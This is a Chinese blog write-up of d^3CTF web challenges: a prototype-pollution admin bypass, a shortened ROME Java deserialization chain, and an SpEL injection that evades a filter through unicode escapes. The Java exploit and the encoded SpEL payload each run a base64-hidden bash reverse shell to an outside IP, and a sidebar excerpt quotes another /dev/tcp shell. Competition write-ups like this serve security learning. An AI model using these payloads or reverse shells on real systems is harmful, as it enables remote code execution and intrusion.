d^3CTF web部分wp

最新推荐文章于 2022-08-04 09:09:33 发布
最新推荐文章于 2022-08-04 09:09:33 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: ctfwp 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/123328252
版权

d3oj

提示是尝试用oct用户登陆,翻组件版本看到个合适的
https://hackerone.com/reports/869574
编辑文章哪里很明显

POST /article/0/edit HTTP/1.1
Host: xxx
User-Agent: xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 62
Origin: xxx
Connection: close
Referer: xxxx
Cookie: connect.sid=xx
Upgrade-Insecure-Requests: 1

{"title":"test","content":{"__proto__":{
"is_admin":true
}}}

shorter

网上公开的只能缩短到2k
jiang师傅正好不久前就给我看过这个rome的新链子
https://www.yuque.com/jinjinshigekeaigui/qskpi5/cz1um4
结合许少的文章和jiang师傅的新rome链子可以缩短到一千多

package d3;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import javassist.*;
import org.jboss.seam.util.Reflections;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Hashtable;

public class exp1 {
    private static byte[] getTemplatesImpl(String cmd) throws CannotCompileException, IOException, NotFoundException {
        ClassPool pool = ClassPool.getDefault();
        CtClass ctClass = pool.makeClass("Evil");
        CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
        ctClass.setSuperclass(superClass);
        CtConstructor constructor = CtNewConstructor.make("    public Evil(){\n" +
                "        try {\n" +
                "            Runtime.getRuntime().exec(\"" + cmd + "\");\n" +
                "        }catch (Exception ignored){}\n" +
                "    }", ctClass);
        ctClass.addConstructor(constructor);
        byte[] bytes = ctClass.toBytecode();
        ctClass.defrost();
        return bytes;
    }

    public static void setFieldValue(Object obj, String fieldname, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldname);
        field.setAccessible(true);
        field.set(obj,value);
    }

    public static byte[] serialize(Object o) throws Exception{
        try(ByteArrayOutputStream baout = new ByteArrayOutputStream();
            ObjectOutputStream oout = new ObjectOutputStream(baout)){
            oout.writeObject(o);
            return baout.toByteArray();
        }
    }


    public static void main(String[] args) throws Exception {



        TemplatesImpl tmpl = new TemplatesImpl();
        Field bytecodes = Reflections.getField(tmpl.getClass(),"_bytecodes");
        setFieldValue(tmpl,"_bytecodes",new byte[][]{getTemplatesImpl("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuNzAuNDAuNS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}")});

        Field name=Reflections.getField(tmpl.getClass(),"_name");
        setFieldValue(tmpl,"_name","s");


        EqualsBean bean = new EqualsBean(String.class,"s");

        HashMap map1 = new HashMap();
        HashMap map2 = new HashMap();
        map1.put("yy",bean);
        map1.put("zZ",tmpl);
        map2.put("zZ",bean);
        map2.put("yy",tmpl);
        Hashtable table = new Hashtable();
        table.put(map1,"1");
        table.put(map2,"2");

        setFieldValue(bean,"_beanClass", Templates.class);
        setFieldValue(bean,"_obj",tmpl);
        byte[] s = serialize(table);
        byte[] payload = Base64.getEncoder().encode(s);
        System.out.print(new String(payload));

ezsql

存在el注入的地方,但把new过滤了,想到编码绕过。

\\\\u([0-9A-Fa-f]{4})

这个正则可以绕,只要两个或两个以上的u即可,比如${\uu006eew String(“123”)}
在这里插入图片描述
直接spel注入,但直接传似乎是有符号问题? 直接全部编码就好了

new javax.script.ScriptEngineManager().getEngineByName(\"js\").eval(\"java.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuNzAuNDAuNS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}')\")"

编码后

${\uu006e\uu0065\uu0077\uu0020\uu006a\uu0061\uu0076\uu0061\uu0078\uu002e\uu0073\uu0063\uu0072\uu0069\uu0070\uu0074\uu002e\uu0053\uu0063\uu0072\uu0069\uu0070\uu0074\uu0045\uu006e\uu0067\uu0069\uu006e\uu0065\uu004d\uu0061\uu006e\uu0061\uu0067\uu0065\uu0072\uu0028\uu0029\uu002e\uu0067\uu0065\uu0074\uu0045\uu006e\uu0067\uu0069\uu006e\uu0065\uu0042\uu0079\uu004e\uu0061\uu006d\uu0065\uu0028\uu0022\uu006a\uu0073\uu0022\uu0029\uu002e\uu0065\uu0076\uu0061\uu006c\uu0028\uu0022\uu006a\uu0061\uu0076\uu0061\uu002e\uu006c\uu0061\uu006e\uu0067\uu002e\uu0052\uu0075\uu006e\uu0074\uu0069\uu006d\uu0065\uu002e\uu0067\uu0065\uu0074\uu0052\uu0075\uu006e\uu0074\uu0069\uu006d\uu0065\uu0028\uu0029\uu002e\uu0065\uu0078\uu0065\uu0063\uu0028\uu0027\uu0062\uu0061\uu0073\uu0068\uu0020\uu002d\uu0063\uu0020\uu007b\uu0065\uu0063\uu0068\uu006f\uu002c\uu0059\uu006d\uu0046\uu007a\uu0061\uu0043\uu0041\uu0074\uu0061\uu0053\uu0041\uu002b\uu004a\uu0069\uu0041\uu0076\uu005a\uu0047\uu0056\uu0032\uu004c\uu0033\uu0052\uu006a\uu0063\uu0043\uu0038\uu0078\uu004d\uu006a\uu0051\uu0075\uu004e\uu007a\uu0041\uu0075\uu004e\uu0044\uu0041\uu0075\uu004e\uu0053\uu0038\uu0078\uu004d\uu006a\uu004d\uu0030\uu0049\uu0044\uu0041\uu002b\uu004a\uu006a\uu0045\uu003d\uu007d\uu007c\uu007b\uu0062\uu0061\uu0073\uu0065\uu0036\uu0034\uu002c\uu002d\uu0064\uu007d\uu007c\uu007b\uu0062\uu0061\uu0073\uu0068\uu002c\uu002d\uu0069\uu007d\uu0027\uu0029\uu0022\uu0029}

在这里插入图片描述

哈哈 赛后我hxd告诉我有个类可以直接执行不需要new
${@jdk.jshell.JShell@create().eval('java.lang.Runtime.getRuntime().exec("")}

学到了学到了

fmyyy1
关注
专栏目录
bugkuctf web 部分wp(自己看得懂)
LJW_wenjingli7的博客
12-15 2543
1.本地管理员 进入网址,查源码,异常的一串n,拉进度条看 == 是base64,解出test123 ,像密码。 这种未知的系统一般要爆破,随便填账号密码,连接代理,打开bp 右键发到repeater,去掉cookie请求,用XXF伪造请求IP,(能考虑到管理员可能是admin,直接省略改名)改user=admin,发送即可 **XXF: X-Forwarded-For:(HTTP的请求端真实的IP) 如题中的:X-Forwarded-For:127.0.0.1 XFF注入..
[CTF]2022美团CTF WEB WP
Sapphire037的博客
09-18 3659
2022美团CTFWEB方向Write up
D3CTF2022-官方WriteUp1
08-03
D3CTF2022-官方WriteUp1
2022-D^3CTF-Web-Writeup
feng的博客
03-07 5581
2022-D^3CTF-Web-Writeup 前言 比赛的时候做了shorter就摆烂了,正好有个作业拖到了周末别的题目就没怎么看。幸好比赛环境还保存1周,把Java给复现了,剩下3题看看wp学习学习不想复现了。别的题目的wp参考网上吧。 shorter rome反序列化,但是要缩短长度。 参考https://4ra1n.love/post/-IMSkqHfy/#%E5%88%A0%E9%99%A4%E9%87%8D%E5%86%99%E6%96%B9%E6%B3%95 但是最后还是长了。改用Jiang宝
DSCTF pwn 部分wp
N1rvana的博客
07-15 696
DSCTF pwn wp
【2022 DSCTF决赛wp
qq_45603443的博客
08-04 939
2022 DSCTF决赛wp
DASCTF3月赛re部分wp
n1ptune__的博客
03-27 440
做出两道re,被大佬们带躺了个12 Enjoyit-1 这题送分题 .net程序,用dnspy反编译,主要逻辑如下 b.b检查输入是否在’_'和’z’之间 b.c是一个改表base64 写脚本解出符合条件的输入 import base64 src='abcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZ=' aaa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123
CTF-5#进击!拿到Web最高权限-WP
最新发布
10-23
CTF/Web安全/ WP最高权限获取 CTF(Capture The Flag)是一种信息安全竞赛形式,目的是为了让参与者通过解决各种挑战和谜题来获取 Flags,证明自己的信息安全能力。WPWeb)是CTF中的一种挑战形式,旨在让参与者...
BugkuCTF题库部分wp
qq_45716477的博客
05-10 691
目录WEB0x01 web10x02 web20x03 web30x04 web40x05 web50x06 web60x07 web70x08 web80x09 web90x0A web100x0B web110x0C web12 WEB 0x01 web1 查看页面源代码即可获得flag。 0x02 web2 发现输入框里只能输入一个数字。 检查源代码,发现输入长度限制为1。修改为2即可输入验证码。 0x03 web3 简单的get传参。 0x04 web4 简单的post传参。使用hackb
D3CTF 2022 d3fuse
weixin_46483787的博客
03-12 496
首先来了解一下什么是fuse 简而言之就是一个二进制文件,但是运行起来之后实现了一个文件系统的功能。 然后我们看题目给的二进制文件: main_real函数的参数ida没有很好的翻译出来,我们看一下源码: 可以看到第三个参数是operation,这里直接放重命名好的: 到这里我们大概摸清了程序功能,其实就是通过这样一个函数表,起了一个用户态文件系统,在文件系统中对文件的各项操作都是由这些函数来实现的。 需要在这些函数中找漏洞 来看rename函数: 这个函数可以和mv file1 file2这个指
Ant x D^3 CTF Official Writeup.pdf
03-22
Ant x D^3 CTF Official Writeup.pdf
AntCTF X D^3CTF shellgen2 题解
CODER的博客
03-20 681
文章目录1. 前言2. 题目描述3. 暴力的算法4. 优化思想4.1 节省变量个数4.2 Array中剩下的字母r、y怎么用起来4.3 变量名只能一堆下划线吗4.4 变量名怎么分配5. 编写代码6. 测试样例7. 后记 1. 前言 本题是一个misc题目,但其中涉及了一些PHP的知识,巧妙的用到了一些算法,笔者将分析本题的设计思想,并给出一个“较”完美的算法。 先来看题目,我们需要给一个php写的webshell,题目会输入一串随机小写字母串,如字符串S:skadkehqasbjkaskad,运行该webs
java Runtime.getRuntime().exec 获取反弹shell
whatday的专栏
07-03 6402
说明 前面写了一篇在Java环境下获取shell的文章。当时使用的语句是: 1 2 3 Runtime r = Runtime.getRuntime(); Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"}); p
银联网关支付接口规范
热门推荐
海未眠的博客
11-15 1万+
中 国 银 联 股 份 有 限 公 司 企 业 标 准 Q/CUP 071.2.1—2015 全渠道平台产品接口规范 产品 1 互联网支付跳转支付 ——网关支付产品 版本号: V2.2 2015-03-31 发布 2015-03-31 实施 发布 中国银联 版权所有 Q/CUP071.2.1—2015 I 中国银联股份有限公司(以下简称“中国银联”)对该规范文档保留全部 知识产权权利,包括但不限于...
2021黑盾杯CTF部分WP
qq_45149716的博客
12-05 5095
一、 Signin 通过观察附件得到附件为一个文本 全由01组成 根据以往的经验来是这个应该是是通过PIL库将01转换为像素点来构造二维码 from PIL import Image MAX = 500 pic = Image.new("RGB", (MAX, MAX)) str="1111...1111" #文档太大所以省略了文档内容" i = 0 for y in range(0, MAX): for x in range(0, MAX): if str[i] == '1':
D3CTF 8-bit解题详解
lllffg的博客
03-08 1100
8-bit pub (在模板注入的路上莽了一整天,然后发现不是模板注入23333333) 尝试SQL注入,猜测后台sql语句 select * from user where username='xxx' and password='xxx'; 一系列操作后没有结果 源码中调用了这个模块 node.js中 express-session的安装使用及session的持久化 express-session中的resave和saveUninitialized express+session实现简易身份认证 然
2022d3CTF 部分web题基础知识学习
weixin_51458899的博客
03-23 4246
[d3ctf2020]shorter rome1.0反序列化链调试见上面(第三周标题为[d3ctf2020]的内容) 当时参考的资料: ROME反序列化分析 (c014.cn) javassist使用全解析 - rickiyang - 博客园 (cnblogs.com) https://xz.aliyun.com/t/6787#toc-8 (java反射入门) https://developer.huawei.com/consumer/cn/forum/topic/020447303398723010
session及cookie问题
weixin_47724586的博客
09-13 452
session及cookie问题 1.当用户登录成功时,会在服务器中创建一个session,session中保存客户端和服务器的连接唯一标识connect-sid, 2.当服务器返回数据时会把字段名叫set-cookie,字段值叫connect-sid的字段放在响应头中 3.客户端接受信息时会检测响应头中是否存在set-cookie字段,如果存在会把字段里的值放到浏览器的cookie中 4.下次客户端发送请求时会把浏览器中cookie的connect-sid放到请求头中。 5.当我们在当前域发送接口时会自动
CTF-WEB总结(四-题目来源i春秋)
weixin_41038905的博客
05-07 5523
Web总结: 1.网页源代码查看 即使浏览器不设置 直接访问此链接也可以看到原代码,后来发现其他网页也是如此, 所以破解方法有三个 一个是直接F12查看元素可以看到 一个是设置浏览器关闭js 一个是直接在链接前加view-source    注意看原代码的链接:view-source:http://159.138.137.79:55803/ 2.直接在链接后加/robots.txt,这边记录了爬虫...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值